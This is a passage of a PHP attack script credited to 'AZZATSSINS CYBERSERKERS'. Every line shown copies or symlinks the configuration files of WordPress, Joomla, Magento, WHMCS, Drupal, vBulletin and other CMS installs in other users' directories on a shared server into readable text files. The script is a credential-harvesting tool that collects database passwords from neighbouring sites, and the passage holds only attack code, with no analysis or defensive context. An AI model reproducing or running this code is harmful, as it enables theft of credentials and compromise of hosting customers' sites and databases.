  940. copy('/'.$home.'/'.$user.'/www/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  941. copy('/'.$home.'/'.$user.'/www/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  942. copy('/'.$home.'/'.$user.'/www/blog/configuration.php',$user.' <~ JOOMLA.txt');
  943. copy('/'.$home.'/'.$user.'/www/submitticket.php',$user.' <~ WHMCS.txt');
  944. copy('/'.$home.'/'.$user.'/www/cms/configuration.php',$user.' <~ JOOMLA.txt');
  945. copy('/'.$home.'/'.$user.'/www/beta/configuration.php',$user.' <~ JOOMLA.txt');
  946. copy('/'.$home.'/'.$user.'/www/portal/configuration.php',$user.' <~ JOOMLA.txt');
  947. copy('/'.$home.'/'.$user.'/www/site/configuration.php',$user.' <~ JOOMLA.txt');
  948. copy('/'.$home.'/'.$user.'/www/main/configuration.php',$user.' <~ JOOMLA.txt');
  949. copy('/'.$home.'/'.$user.'/www/home/configuration.php',$user.' <~ JOOMLA.txt');
  950. copy('/'.$home.'/'.$user.'/www/demo/configuration.php',$user.' <~ JOOMLA.txt');
  951. copy('/'.$home.'/'.$user.'/www/test/configuration.php',$user.' <~ JOOMLA.txt');
  952. copy('/'.$home.'/'.$user.'/www/v1/configuration.php',$user.' <~ JOOMLA.txt');
  953. copy('/'.$home.'/'.$user.'/www/v2/configuration.php',$user.' <~ JOOMLA.txt');
  954. copy('/'.$home.'/'.$user.'/www/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  955. copy('/'.$home.'/'.$user.'/www/new/configuration.php',$user.' <~ JOOMLA.txt');
  956. copy('/'.$home.'/'.$user.'/www/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  957. copy('/'.$home.'/'.$user.'/www/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  958. symlink('/'.$home.'/'.$user.'/www/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  959. symlink('/'.$home.'/'.$user.'/www/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  960. symlink('/'.$home.'/'.$user.'/www/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  961. symlink('/'.$home.'/'.$user.'/www/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  962. /* AUTHOR : AZZATSSINS CYBERSERKERS */
  963. symlink('/'.$home.'/'.$user.'/www/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  964. symlink('/'.$home.'/'.$user.'/www/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  965. symlink('/'.$home.'/'.$user.'/www/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  966. symlink('/'.$home.'/'.$user.'/www/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  967. symlink('/'.$home.'/'.$user.'/www/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  968. symlink('/'.$home.'/'.$user.'/www/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  969. symlink('/'.$home.'/'.$user.'/www/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  970. symlink('/'.$home.'/'.$user.'/www/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  971. symlink('/'.$home.'/'.$user.'/www/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  972. symlink('/'.$home.'/'.$user.'/www/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  973. symlink('/'.$home.'/'.$user.'/www/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  974. symlink('/'.$home.'/'.$user.'/www/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  975. symlink('/'.$home.'/'.$user.'/www/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  976. /*You Can ReCoded But Don't Change ©CopyRight*/
  977. /*e.g: Recoded By xxxxxx & © AZZATSSINS*/
  978. symlink('/'.$home.'/'.$user.'/www/blog/configuration.php',$user.' <~ JOOMLA.txt');
  979. symlink('/'.$home.'/'.$user.'/www/submitticket.php',$user.' <~ WHMCS.txt');
  980. symlink('/'.$home.'/'.$user.'/www/cms/configuration.php',$user.' <~ JOOMLA.txt');
  981. symlink('/'.$home.'/'.$user.'/www/beta/configuration.php',$user.' <~ JOOMLA.txt');
  982. symlink('/'.$home.'/'.$user.'/www/portal/configuration.php',$user.' <~ JOOMLA.txt');
  983. /* © BY AZZATSSINS CYBERSERKERS */
  984. symlink('/'.$home.'/'.$user.'/www/site/configuration.php',$user.' <~ JOOMLA.txt');
  985. symlink('/'.$home.'/'.$user.'/www/main/configuration.php',$user.' <~ JOOMLA.txt');
  986. symlink('/'.$home.'/'.$user.'/www/home/configuration.php',$user.' <~ JOOMLA.txt');
  987. symlink('/'.$home.'/'.$user.'/www/demo/configuration.php',$user.' <~ JOOMLA.txt');
  988. symlink('/'.$home.'/'.$user.'/www/test/configuration.php',$user.' <~ JOOMLA.txt');
  989. symlink('/'.$home.'/'.$user.'/www/v1/configuration.php',$user.' <~ JOOMLA.txt');
  990. symlink('/'.$home.'/'.$user.'/www/v2/configuration.php',$user.' <~ JOOMLA.txt');
  991. symlink('/'.$home.'/'.$user.'/www/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  992. symlink('/'.$home.'/'.$user.'/www/new/configuration.php',$user.' <~ JOOMLA.txt');
  993. symlink('/'.$home.'/'.$user.'/www/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  994. symlink('/'.$home.'/'.$user.'/www/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  995. copy('/'.$home.'/'.$user.'/www/application/config/database.php',$user.' <~ ELLISLAB.txt');
  996. copy('/'.$home.'/'.$user.'/www/admin/config.php',$user.' <~ OPENCART.txt');
  997. copy('/'.$home.'/'.$user.'/www/sites/default/settings.php',$user.' <~ DRUPAL.txt');
  998. copy('/'.$home.'/'.$user.'/www/forum/config.php',$user.' <~ PHPBB.txt');
  999. symlink('/'.$home.'/'.$user.'/www/application/config/database.php',$user.' <~ ELLISLAB.txt');
  1000. symlink('/'.$home.'/'.$user.'/www/admin/config.php',$user.' <~ OPENCART.txt');
  1001. symlink('/'.$home.'/'.$user.'/www/sites/default/settings.php',$user.' <~ DRUPAL.txt');
  1002. symlink('/'.$home.'/'.$user.'/www/forum/config.php',$user.' <~ PHPBB.txt');
  1003. copy('/'.$home.'/'.$user.'/www/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  1004. copy('/'.$home.'/'.$user.'/www/includes/config.php',$user.' <~ VBULLETIN.txt');
  1005. copy('/'.$home.'/'.$user.'/www/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  1006. copy('/'.$home.'/'.$user.'/www/config.php',$user.' <~ OTHER.txt');
  1007. copy('/'.$home.'/'.$user.'/www/html/config.php',$user.' <~ PHPNUKE.txt');
  1008. symlink('/'.$home.'/'.$user.'/www/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  1009. symlink('/'.$home.'/'.$user.'/www/includes/config.php',$user.' <~ VBULLETIN.txt');
  1010. symlink('/'.$home.'/'.$user.'/www/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  1011. symlink('/'.$home.'/'.$user.'/www/config.php',$user.' <~ OTHER.txt');
  1012. symlink('/'.$home.'/'.$user.'/www/html/config.php',$user.' <~ PHPNUKE.txt');
  1013. copy('/'.$home.'/'.$user.'/www/conn.php',$user.' <~ OTHER.txt');
  1014. symlink('/'.$home.'/'.$user.'/www/conn.php',$user.' <~ OTHER.txt');
  1015. symlink('/'.$home.'/'.$user.'/www/inc/config.inc.php',$user.' <~ OTHER.txt');
  1016. copy('/'.$home.'/'.$user.'/www/application/config/database.php',$user.' <~ OTHER.txt');
  1017. symlink('/'.$home.'/'.$user.'/www/application/config/database.php',$user.' <~ OTHER.txt');
  1018. copy('/'.$home.'/'.$user.'/www/inc/config.inc.php',$user.' <~ OTHER.txt');
  1019. copy('/var/www/vhosts/'.$user.'/httpdocs/application/config/database.php',$user.' <~ ELLISLAB.txt');
  1020. copy('/var/www/vhosts/'.$user.'/httpdocs/admin/config.php',$user.' <~ OPENCART.txt');
  1021. copy('/var/www/vhosts/'.$user.'/httpdocs/sites/default/settings.php',$user.' <~ DRUPAL.txt');
  1022. copy('/var/www/vhosts/'.$user.'/httpdocs/forum/config.php',$user.' <~ PHPBB.txt');
  1023. copy('/var/www/vhosts/'.$user.'/httpdocs/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  1024. copy('/var/www/vhosts/'.$user.'/httpdocs/includes/config.php',$user.' <~ VBULLETIN.txt');
  1025. copy('/var/www/vhosts/'.$user.'/httpdocs/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  1026. copy('/var/www/vhosts/'.$user.'/httpdocs/config.php',$user.' <~ OTHER.txt');
  1027. copy('/var/www/vhosts/'.$user.'/httpdocs/html/config.php',$user.' <~ PHPNUKE.txt');
  1028. copy('/var/www/vhosts/'.$user.'/httpdocs/conn.php',$user.' <~ OTHER.txt');
  1029. copy('/var/www/vhosts/'.$user.'/httpdocs/inc/config.inc.php',$user.' <~ OTHER.txt');
  1030. copy('/var/www/vhosts/'.$user.'/httpdocs/application/config/database.php',$user.' <~ OTHER.txt');
  1031. copy('/var/www/vhosts/'.$user.'/httpdocs/application/config/database.php',$user.' <~ OTHER.txt');
  1032. copy('/var/www/vhosts/'.$user.'/httpdocs/wp-config.php',$user.' <~ WORDPRESS.txt');
  1033. copy('/var/www/vhosts/'.$user.'/httpdocs/wp-configuration.php',$user.' <~ JOOMLA.txt');
  1034. copy('/var/www/vhosts/'.$user.'/httpdocs/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1035. copy('/var/www/vhosts/'.$user.'/httpdocs/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  1036. copy('/var/www/vhosts/'.$user.'/httpdocs/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  1037. copy('/var/www/vhosts/'.$user.'/httpdocs/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  1038. /* AUTHOR : AZZATSSINS CYBERSERKERS */
  1039. copy('/var/www/vhosts/'.$user.'/httpdocs/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  1040. copy('/var/www/vhosts/'.$user.'/httpdocs/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  1041. copy('/var/www/vhosts/'.$user.'/httpdocs/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  1042. copy('/var/www/vhosts/'.$user.'/httpdocs/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  1043. copy('/var/www/vhosts/'.$user.'/httpdocs/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  1044. copy('/var/www/vhosts/'.$user.'/httpdocs/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1045. copy('/var/www/vhosts/'.$user.'/httpdocs/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  1046. copy('/var/www/vhosts/'.$user.'/httpdocs/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  1047. copy('/var/www/vhosts/'.$user.'/httpdocs/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  1048. copy('/var/www/vhosts/'.$user.'/httpdocs/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  1049. copy('/var/www/vhosts/'.$user.'/httpdocs/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  1050. copy('/var/www/vhosts/'.$user.'/httpdocs/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  1051. copy('/var/www/vhosts/'.$user.'/httpdocs/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  1052. copy('/var/www/vhosts/'.$user.'/httpdocs/blog/configuration.php',$user.' <~ JOOMLA.txt');
  1053. copy('/var/www/vhosts/'.$user.'/httpdocs/submitticket.php',$user.' <~ WHMCS.txt');
  1054. copy('/var/www/vhosts/'.$user.'/httpdocs/cms/configuration.php',$user.' <~ JOOMLA.txt');
  1055. copy('/var/www/vhosts/'.$user.'/httpdocs/beta/configuration.php',$user.' <~ JOOMLA.txt');
  1056. copy('/var/www/vhosts/'.$user.'/httpdocs/portal/configuration.php',$user.' <~ JOOMLA.txt');
  1057. copy('/var/www/vhosts/'.$user.'/httpdocs/site/configuration.php',$user.' <~ JOOMLA.txt');
  1058. copy('/var/www/vhosts/'.$user.'/httpdocs/main/configuration.php',$user.' <~ JOOMLA.txt');
  1059. copy('/var/www/vhosts/'.$user.'/httpdocs/home/configuration.php',$user.' <~ JOOMLA.txt');
  1060. copy('/var/www/vhosts/'.$user.'/httpdocs/demo/configuration.php',$user.' <~ JOOMLA.txt');
  1061. copy('/var/www/vhosts/'.$user.'/httpdocs/test/configuration.php',$user.' <~ JOOMLA.txt');
  1062. copy('/var/www/vhosts/'.$user.'/httpdocs/v1/configuration.php',$user.' <~ JOOMLA.txt');
  1063. copy('/var/www/vhosts/'.$user.'/httpdocs/v2/configuration.php',$user.' <~ JOOMLA.txt');
  1064. copy('/var/www/vhosts/'.$user.'/httpdocs/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  1065. copy('/var/www/vhosts/'.$user.'/httpdocs/new/configuration.php',$user.' <~ JOOMLA.txt');
  1066. copy('/var/www/vhosts/'.$user.'/httpdocs/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  1067. copy('/var/www/vhosts/'.$user.'/httpdocs/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  1068. symlink('/var/www/vhosts/'.$user.'/httpdocs/application/config/database.php',$user.' <~ ELLISLAB.txt');
  1069. symlink('/var/www/vhosts/'.$user.'/httpdocs/admin/config.php',$user.' <~ OPENCART.txt');
  1070. symlink('/var/www/vhosts/'.$user.'/httpdocs/sites/default/settings.php',$user.' <~ DRUPAL.txt');
  1071. symlink('/var/www/vhosts/'.$user.'/httpdocs/forum/config.php',$user.' <~ PHPBB.txt');
  1072. symlink('/var/www/vhosts/'.$user.'/httpdocs/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  1073. symlink('/var/www/vhosts/'.$user.'/httpdocs/includes/config.php',$user.' <~ VBULLETIN.txt');
  1074. symlink('/var/www/vhosts/'.$user.'/httpdocs/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  1075. symlink('/var/www/vhosts/'.$user.'/httpdocs/config.php',$user.' <~ OTHER.txt');
  1076. symlink('/var/www/vhosts/'.$user.'/httpdocs/html/config.php',$user.' <~ PHPNUKE.txt');
  1077. symlink('/var/www/vhosts/'.$user.'/httpdocs/conn.php',$user.' <~ OTHER.txt');
  1078. symlink('/var/www/vhosts/'.$user.'/httpdocs/inc/config.inc.php',$user.' <~ OTHER.txt');
  1079. copy('/var/www/vhosts/'.$user.'/httpdocs/application/config/database.php',$user.' <~ OTHER.txt');
  1080. symlink('/var/www/vhosts/'.$user.'/httpdocs/application/config/database.php',$user.' <~ OTHER.txt');
  1081. symlink('/var/www/vhosts/'.$user.'/httpdocs/wp-config.php',$user.' <~ WORDPRESS.txt');
  1082. symlink('/var/www/vhosts/'.$user.'/httpdocs/wp-configuration.php',$user.' <~ JOOMLA.txt');
  1083. symlink('/var/www/vhosts/'.$user.'/httpdocs/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1084. symlink('/var/www/vhosts/'.$user.'/httpdocs/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  1085. symlink('/var/www/vhosts/'.$user.'/httpdocs/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  1086. symlink('/var/www/vhosts/'.$user.'/httpdocs/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  1087. /* AUTHOR : AZZATSSINS CYBERSERKERS */
  1088. symlink('/var/www/vhosts/'.$user.'/httpdocs/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  1089. symlink('/var/www/vhosts/'.$user.'/httpdocs/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  1090. symlink('/var/www/vhosts/'.$user.'/httpdocs/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  1091. symlink('/var/www/vhosts/'.$user.'/httpdocs/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  1092. symlink('/var/www/vhosts/'.$user.'/httpdocs/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  1093. symlink('/var/www/vhosts/'.$user.'/httpdocs/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1094. symlink('/var/www/vhosts/'.$user.'/httpdocs/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  1095. symlink('/var/www/vhosts/'.$user.'/httpdocs/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  1096. symlink('/var/www/vhosts/'.$user.'/httpdocs/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  1097. symlink('/var/www/vhosts/'.$user.'/httpdocs/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  1098. symlink('/var/www/vhosts/'.$user.'/httpdocs/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  1099. symlink('/var/www/vhosts/'.$user.'/httpdocs/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  1100. symlink('/var/www/vhosts/'.$user.'/httpdocs/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  1101. symlink('/var/www/vhosts/'.$user.'/httpdocs/blog/configuration.php',$user.' <~ JOOMLA.txt');
  1102. symlink('/var/www/vhosts/'.$user.'/httpdocs/submitticket.php',$user.' <~ WHMCS.txt');
  1103. symlink('/var/www/vhosts/'.$user.'/httpdocs/cms/configuration.php',$user.' <~ JOOMLA.txt');
  1104. symlink('/var/www/vhosts/'.$user.'/httpdocs/beta/configuration.php',$user.' <~ JOOMLA.txt');
  1105. symlink('/var/www/vhosts/'.$user.'/httpdocs/portal/configuration.php',$user.' <~ JOOMLA.txt');
  1106. symlink('/var/www/vhosts/'.$user.'/httpdocs/site/configuration.php',$user.' <~ JOOMLA.txt');
  1107. symlink('/var/www/vhosts/'.$user.'/httpdocs/main/configuration.php',$user.' <~ JOOMLA.txt');
  1108. symlink('/var/www/vhosts/'.$user.'/httpdocs/home/configuration.php',$user.' <~ JOOMLA.txt');
  1109. symlink('/var/www/vhosts/'.$user.'/httpdocs/demo/configuration.php',$user.' <~ JOOMLA.txt');
  1110. symlink('/var/www/vhosts/'.$user.'/httpdocs/test/configuration.php',$user.' <~ JOOMLA.txt');
  1111. symlink('/var/www/vhosts/'.$user.'/httpdocs/v1/configuration.php',$user.' <~ JOOMLA.txt');
  1112. symlink('/var/www/vhosts/'.$user.'/httpdocs/v2/configuration.php',$user.' <~ JOOMLA.txt');
  1113. symlink('/var/www/vhosts/'.$user.'/httpdocs/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  1114. symlink('/var/www/vhosts/'.$user.'/httpdocs/new/configuration.php',$user.' <~ JOOMLA.txt');
  1115. symlink('/var/www/vhosts/'.$user.'/httpdocs/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  1116. symlink('/var/www/vhosts/'.$user.'/httpdocs/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  1117. copy('/var/www/vhosts/'.$user.'/html/application/config/database.php',$user.' <~ ELLISLAB.txt');
  1118. copy('/var/www/vhosts/'.$user.'/html/admin/config.php',$user.' <~ OPENCART.txt');
  1119. copy('/var/www/vhosts/'.$user.'/html/sites/default/settings.php',$user.' <~ DRUPAL.txt');
  1120. copy('/var/www/vhosts/'.$user.'/html/forum/config.php',$user.' <~ PHPBB.txt');
  1121. copy('/var/www/vhosts/'.$user.'/html/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  1122. copy('/var/www/vhosts/'.$user.'/html/includes/config.php',$user.' <~ VBULLETIN.txt');
  1123. copy('/var/www/vhosts/'.$user.'/html/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  1124. copy('/var/www/vhosts/'.$user.'/html/config.php',$user.' <~ OTHER.txt');
  1125. copy('/var/www/vhosts/'.$user.'/html/html/config.php',$user.' <~ PHPNUKE.txt');
  1126. copy('/var/www/vhosts/'.$user.'/html/conn.php',$user.' <~ OTHER.txt');
  1127. copy('/var/www/vhosts/'.$user.'/html/inc/config.inc.php',$user.' <~ OTHER.txt');
  1128. copy('/var/www/vhosts/'.$user.'/html/application/config/database.php',$user.' <~ OTHER.txt');
  1129. copy('/var/www/vhosts/'.$user.'/html/application/config/database.php',$user.' <~ OTHER.txt');
  1130. copy('/var/www/vhosts/'.$user.'/html/wp-config.php',$user.' <~ WORDPRESS.txt');
  1131. copy('/var/www/vhosts/'.$user.'/html/wp-configuration.php',$user.' <~ JOOMLA.txt');
  1132. copy('/var/www/vhosts/'.$user.'/html/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1133. copy('/var/www/vhosts/'.$user.'/html/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  1134. copy('/var/www/vhosts/'.$user.'/html/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  1135. copy('/var/www/vhosts/'.$user.'/html/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  1136. /* AUTHOR : AZZATSSINS CYBERSERKERS */
  1137. copy('/var/www/vhosts/'.$user.'/html/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  1138. copy('/var/www/vhosts/'.$user.'/html/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  1139. copy('/var/www/vhosts/'.$user.'/html/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  1140. copy('/var/www/vhosts/'.$user.'/html/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  1141. copy('/var/www/vhosts/'.$user.'/html/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  1142. copy('/var/www/vhosts/'.$user.'/html/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1143. copy('/var/www/vhosts/'.$user.'/html/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  1144. copy('/var/www/vhosts/'.$user.'/html/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  1145. copy('/var/www/vhosts/'.$user.'/html/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  1146. copy('/var/www/vhosts/'.$user.'/html/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  1147. copy('/var/www/vhosts/'.$user.'/html/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  1148. copy('/var/www/vhosts/'.$user.'/html/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  1149. copy('/var/www/vhosts/'.$user.'/html/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  1150. copy('/var/www/vhosts/'.$user.'/html/blog/configuration.php',$user.' <~ JOOMLA.txt');
  1151. copy('/var/www/vhosts/'.$user.'/html/submitticket.php',$user.' <~ WHMCS.txt');
  1152. copy('/var/www/vhosts/'.$user.'/html/cms/configuration.php',$user.' <~ JOOMLA.txt');
  1153. copy('/var/www/vhosts/'.$user.'/html/beta/configuration.php',$user.' <~ JOOMLA.txt');
  1154. copy('/var/www/vhosts/'.$user.'/html/portal/configuration.php',$user.' <~ JOOMLA.txt');
  1155. copy('/var/www/vhosts/'.$user.'/html/site/configuration.php',$user.' <~ JOOMLA.txt');
  1156. copy('/var/www/vhosts/'.$user.'/html/main/configuration.php',$user.' <~ JOOMLA.txt');
  1157. copy('/var/www/vhosts/'.$user.'/html/home/configuration.php',$user.' <~ JOOMLA.txt');
  1158. copy('/var/www/vhosts/'.$user.'/html/demo/configuration.php',$user.' <~ JOOMLA.txt');
  1159. copy('/var/www/vhosts/'.$user.'/html/test/configuration.php',$user.' <~ JOOMLA.txt');
  1160. copy('/var/www/vhosts/'.$user.'/html/v1/configuration.php',$user.' <~ JOOMLA.txt');
  1161. copy('/var/www/vhosts/'.$user.'/html/v2/configuration.php',$user.' <~ JOOMLA.txt');
  1162. copy('/var/www/vhosts/'.$user.'/html/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  1163. copy('/var/www/vhosts/'.$user.'/html/new/configuration.php',$user.' <~ JOOMLA.txt');
  1164. copy('/var/www/vhosts/'.$user.'/html/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  1165. copy('/var/www/vhosts/'.$user.'/html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  1166. copy('/var/www/vhosts/'.$user.'/application/config/database.php',$user.' <~ ELLISLAB.txt');
  1167. copy('/var/www/vhosts/'.$user.'/admin/config.php',$user.' <~ OPENCART.txt');
  1168. copy('/var/www/vhosts/'.$user.'/sites/default/settings.php',$user.' <~ DRUPAL.txt');
  1169. copy('/var/www/vhosts/'.$user.'/forum/config.php',$user.' <~ PHPBB.txt');
  1170. copy('/var/www/vhosts/'.$user.'/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  1171. copy('/var/www/vhosts/'.$user.'/includes/config.php',$user.' <~ VBULLETIN.txt');
  1172. copy('/var/www/vhosts/'.$user.'/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  1173. copy('/var/www/vhosts/'.$user.'/config.php',$user.' <~ OTHER.txt');
  1174. copy('/var/www/vhosts/'.$user.'/html/config.php',$user.' <~ PHPNUKE.txt');
  1175. copy('/var/www/vhosts/'.$user.'/conn.php',$user.' <~ OTHER.txt');
  1176. copy('/var/www/vhosts/'.$user.'/inc/config.inc.php',$user.' <~ OTHER.txt');
  1177. copy('/var/www/vhosts/'.$user.'/application/config/database.php',$user.' <~ OTHER.txt');
  1178. copy('/var/www/vhosts/'.$user.'/application/config/database.php',$user.' <~ OTHER.txt');
  1179. copy('/var/www/vhosts/'.$user.'/wp-config.php',$user.' <~ WORDPRESS.txt');
  1180. copy('/var/www/vhosts/'.$user.'/wp-configuration.php',$user.' <~ JOOMLA.txt');
  1181. copy('/var/www/vhosts/'.$user.'/wp/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1182. copy('/var/www/vhosts/'.$user.'/blog/wp-config.php',$user.' <~ WORDPRESS.txt');
  1183. copy('/var/www/vhosts/'.$user.'/beta/wp-config.php',$user.' <~ WORDPRESS.txt');
  1184. copy('/var/www/vhosts/'.$user.'/portal/wp-config.php',$user.' <~ WORDPRESS.txt');
  1185. /* AUTHOR : AZZATSSINS CYBERSERKERS */
  1186. copy('/var/www/vhosts/'.$user.'/site/wp-config.php',$user.' <~ WORDPRESS.txt');
  1187. copy('/var/www/vhosts/'.$user.'/wp/wp-config.php',$user.' <~ WORDPRESS.txt');
  1188. copy('/var/www/vhosts/'.$user.'/WP/wp-config.php',$user.' <~ WORDPRESS.txt');
  1189. copy('/var/www/vhosts/'.$user.'/news/wp-config.php',$user.' <~ WORDPRESS.txt');
  1190. copy('/var/www/vhosts/'.$user.'/wordpress/wp-config.php',$user.' <~ WORDPRESS.txt');
  1191. copy('/var/www/vhosts/'.$user.'/test/wp-config.php',$user.' <~ WORDPRESS.txt');
  1192. copy('/var/www/vhosts/'.$user.'/demo/wp-config.php',$user.' <~ WORDPRESS.txt');
  1193. copy('/var/www/vhosts/'.$user.'/home/wp-config.php',$user.' <~ WORDPRESS.txt');
  1194. copy('/var/www/vhosts/'.$user.'/v1/wp-config.php',$user.' <~ WORDPRESS.txt');
  1195. copy('/var/www/vhosts/'.$user.'/v2/wp-config.php',$user.' <~ WORDPRESS.txt');
  1196. copy('/var/www/vhosts/'.$user.'/press/wp-config.php',$user.' <~ WORDPRESS.txt');
  1197. copy('/var/www/vhosts/'.$user.'/new/wp-config.php',$user.' <~ WORDPRESS.txt');
  1198. copy('/var/www/vhosts/'.$user.'/blogs/wp-config.php',$user.' <~ WORDPRESS.txt');
  1199. copy('/var/www/vhosts/'.$user.'/blog/configuration.php',$user.' <~ JOOMLA.txt');
  1200. copy('/var/www/vhosts/'.$user.'/submitticket.php',$user.' <~ WHMCS.txt');
  1201. copy('/var/www/vhosts/'.$user.'/cms/configuration.php',$user.' <~ JOOMLA.txt');
  1202. copy('/var/www/vhosts/'.$user.'/beta/configuration.php',$user.' <~ JOOMLA.txt');
  1203. copy('/var/www/vhosts/'.$user.'/portal/configuration.php',$user.' <~ JOOMLA.txt');
  1204. copy('/var/www/vhosts/'.$user.'/site/configuration.php',$user.' <~ JOOMLA.txt');
  1205. copy('/var/www/vhosts/'.$user.'/main/configuration.php',$user.' <~ JOOMLA.txt');
  1206. copy('/var/www/vhosts/'.$user.'/home/configuration.php',$user.' <~ JOOMLA.txt');
  1207. copy('/var/www/vhosts/'.$user.'/demo/configuration.php',$user.' <~ JOOMLA.txt');
  1208. copy('/var/www/vhosts/'.$user.'/test/configuration.php',$user.' <~ JOOMLA.txt');
  1209. copy('/var/www/vhosts/'.$user.'/v1/configuration.php',$user.' <~ JOOMLA.txt');
  1210. copy('/var/www/vhosts/'.$user.'/v2/configuration.php',$user.' <~ JOOMLA.txt');
  1211. copy('/var/www/vhosts/'.$user.'/joomla/configuration.php',$user.' <~ JOOMLA.txt');
  1212. copy('/var/www/vhosts/'.$user.'/new/configuration.php',$user.' <~ JOOMLA.txt');
  1213. copy('/var/www/vhosts/'.$user.'/app/etc/local.xml',$user.' <~ MAGENTO.txt');
  1214. copy('/var/www/vhosts/'.$user.'/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  1215. copy('/var/www/'.$user.'/html/config/settings.inc.php',$user.' <~ PRESTASHOP.txt');
  1216. copy('/var/www/'.$user.'/application/config/database.php',$user.' <~ ELLISLAB.txt');
  1217. copy('/var/www/'.$user.'/admin/config.php',$user.' <~ OPENCART.txt');
  1218. copy('/var/www/'.$user.'/sites/default/settings.php',$user.' <~ DRUPAL.txt');
  1219. copy('/var/www/'.$user.'/forum/config.php',$user.' <~ PHPBB.txt');
  1220. copy('/var/www/'.$user.'/vb/includes/config.php',$user.' <~ VBULLETIN.txt');
  1221. copy('/var/www/'.$user.'/includes/config.php',$user.' <~ VBULLETIN.txt');
  1222. copy('/var/www/'.$user.'/forum/includes/config.php',$user.' <~ VBULLETIN.txt');
  1223. copy('/var/www/'.$user.'/config.php',$user.' <~ OTHER.txt');
